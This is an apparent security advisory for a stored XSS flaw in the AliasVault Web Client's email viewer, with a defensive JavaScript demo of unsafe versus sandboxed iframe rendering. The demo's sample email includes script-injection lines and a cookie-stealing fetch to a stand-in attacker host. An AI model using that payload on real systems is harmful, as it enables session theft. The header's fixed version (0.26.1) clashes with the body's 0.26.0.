Platform: javascript
Component: aliasvault
Fixed in: 0.26.1
A stored cross-site scripting (XSS) vulnerability exists in AliasVault Web Client versions 0.25.3 and earlier. It resides in the email rendering feature, specifically the view shown when a user opens an email received on one of their aliases. An attacker who sends a crafted HTML email to an alias can inject JavaScript that executes in the recipient's browser when the message is opened, potentially compromising the account and the data it holds. The vulnerability is fixed in version 0.26.0.
The impact is significant because the attack requires no interaction beyond the victim reading mail: an alias is designed to accept messages from arbitrary senders, so the attacker only needs to know the alias address. When the victim views the email in the AliasVault Web Client, the injected JavaScript executes in the same origin as the application rather than in an isolated context. It can therefore read session material, redirect the user to a phishing page, rewrite the page's content, or act on the user's behalf inside the application. The lack of origin isolation within the iframe rendering process exacerbates the risk, since the framed email content is not kept apart from the user's session. A single malicious message campaign against known aliases could lead to widespread account compromise and data exposure.
This vulnerability was publicly disclosed on 2026-03-03. No public proof-of-concept (PoC) code had been released at the time of writing, but stored XSS in an email viewer is straightforward to reproduce, so PoCs are likely to emerge. The CVSS score of 9.3 (CRITICAL) measures severity, not likelihood of exploitation; the EPSS estimate below is a separate, currently low, exploitation-probability figure. The vulnerability is not listed in the CISA KEV catalog.
Exploit Status
EPSS: 0.04% (12th percentile)
The primary mitigation for CVE-2026-26266 is to upgrade AliasVault Web Client to version 0.26.0 or later as soon as possible. Until the upgrade is applied, the practical interim measure is to avoid opening unexpected or unsolicited HTML email received on aliases in the web client. Sender-based filtering offers little here, because aliases exist precisely to receive mail from senders the user has no prior relationship with. A Web Application Firewall (WAF) is likewise a weak control for this bug: the payload is delivered to the alias over SMTP and only becomes dangerous when the client renders it, so a WAF in front of the web application sees the email body, if at all, only when it is later fetched over HTTP, and generic XSS signatures are easy to evade in HTML email. Treat any such filtering as defense in depth, not as a substitute for the fix, and check AliasVault's security advisories for further guidance and updates.
Upgrade AliasVault Web Client to version 0.26.0 or later. This release fixes the XSS vulnerability by applying sanitization and sandboxing to the HTML content of emails before it is rendered. The update prevents malicious scripts from executing when emails are viewed in the web client.
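As an added illustration (this is not AliasVault's code; the function names, the sample email, the CSP string and the audit helper are mine), the following JavaScript contrasts an unsafe way of placing email HTML into an iframe with the sanitize-and-sandbox pattern the fix is described as taking. It runs under Node and only builds and inspects the markup. The sanitizer step is assumed to be a maintained library such as DOMPurify and is deliberately not reimplemented; the hardened builder is fed the raw sample to show that the sandbox layer holds even when sanitization is bypassed.

```javascript
// Added example, not AliasVault's code. Function names are illustrative.

// Escape text for use inside a double-quoted HTML attribute such as srcdoc.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Constructed sample: the kind of body an attacker could send to any alias.
const MALICIOUS_EMAIL_HTML =
  "<p>Your invoice is attached.</p>" +
  "<img src=x onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)\">" +
  "<script>alert(document.domain)</script>" +
  "\"><script>alert(1)</script>"; // stray quote breaks out of an unescaped srcdoc

// Vulnerable pattern: raw email HTML in a same-origin frame, no sandbox and no
// attribute escaping. Any script in the email runs with the application's origin.
function buildEmailFrameVulnerable(emailHtml) {
  return '<iframe srcdoc="' + emailHtml + '"></iframe>';
}

// CSP enforced inside the framed document (assumed policy): no script, no
// remote loads (which also blocks tracking pixels), inline styles only.
const FRAME_CSP = "default-src 'none'; img-src data:; style-src 'unsafe-inline'";

// Hardened pattern. `sanitizedHtml` is assumed to have already passed through
// an HTML sanitizer. The empty sandbox attribute gives the frame an opaque
// origin and disables script, forms and top-level navigation, so markup the
// sanitizer missed still cannot reach the application's session.
function buildEmailFrameHardened(sanitizedHtml) {
  const doc =
    "<!doctype html><html><head>" +
    '<meta http-equiv="Content-Security-Policy" content="' + FRAME_CSP + '">' +
    "</head><body>" + sanitizedHtml + "</body></html>";
  return (
    '<iframe sandbox="" referrerpolicy="no-referrer" srcdoc="' +
    escapeAttr(doc) +
    '"></iframe>'
  );
}

// Read one double-quoted attribute out of a generated <iframe> tag.
function readAttr(frameHtml, name) {
  const m = new RegExp("\\b" + name + '="([^"]*)"').exec(frameHtml);
  return m ? m[1] : null;
}

// Review check for a sandbox token list. allow-scripts together with
// allow-same-origin is the combination to reject outright: the framed
// document can then reach its parent and strip its own sandbox attribute.
function sandboxVerdict(tokens) {
  const set = new Set((tokens || "").trim().split(/\s+/).filter(Boolean));
  if (set.has("allow-scripts") && set.has("allow-same-origin")) return "ineffective";
  if (set.has("allow-scripts")) return "weak"; // email content should never run script
  return "ok";
}

// Audit a generated frame: it must carry an acceptable sandbox attribute and
// the email markup must not escape the srcdoc attribute value.
function auditFrame(frameHtml) {
  const findings = [];
  const sandbox = readAttr(frameHtml, "sandbox");
  if (sandbox === null) findings.push("no sandbox");
  else if (sandboxVerdict(sandbox) !== "ok") findings.push("sandbox " + sandboxVerdict(sandbox));
  // A literal '<script' outside the captured srcdoc value means attribute breakout.
  const srcdoc = readAttr(frameHtml, "srcdoc") || "";
  const outside = frameHtml.replace(srcdoc, "");
  if (/<script/i.test(outside)) findings.push("attribute breakout");
  return findings;
}

console.log("vulnerable:", auditFrame(buildEmailFrameVulnerable(MALICIOUS_EMAIL_HTML)));
console.log("hardened:  ", auditFrame(buildEmailFrameHardened(MALICIOUS_EMAIL_HTML)));
```

The vulnerable builder is flagged twice: the frame has no sandbox, and the stray quote in the sample lets the email's own `<script>` land outside the `srcdoc` attribute. The hardened builder passes because the attribute is escaped, the frame is sandboxed, and the CSP inside the framed document blocks script and remote loads independently of the sandbox. In a real client the sanitizer runs first; the sandbox and CSP are there for whatever it misses.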
CVE-2026-26266 is a critical stored XSS vulnerability in AliasVault Web Client versions 0.25.3 and earlier. It lets an attacker embed JavaScript in an email sent to an alias, which executes when the recipient views the message and can compromise the account.
If you run AliasVault Web Client version 0.25.3 or earlier, you are affected. Upgrade to version 0.26.0 or later to remove the vulnerability.
The fix is to upgrade AliasVault Web Client to version 0.26.0 or later, which sanitizes and sandboxes email HTML before rendering it.
No active exploitation has been confirmed, but the severity and the low effort needed to exploit a stored XSS in an email viewer make it a likely target. Apply the upgrade proactively rather than waiting for evidence of attacks.
Refer to the official AliasVault security advisory for detailed information and updates regarding CVE-2026-26266: [https://aliasvault.com/security/advisories](https://aliasvault.com/security/advisories)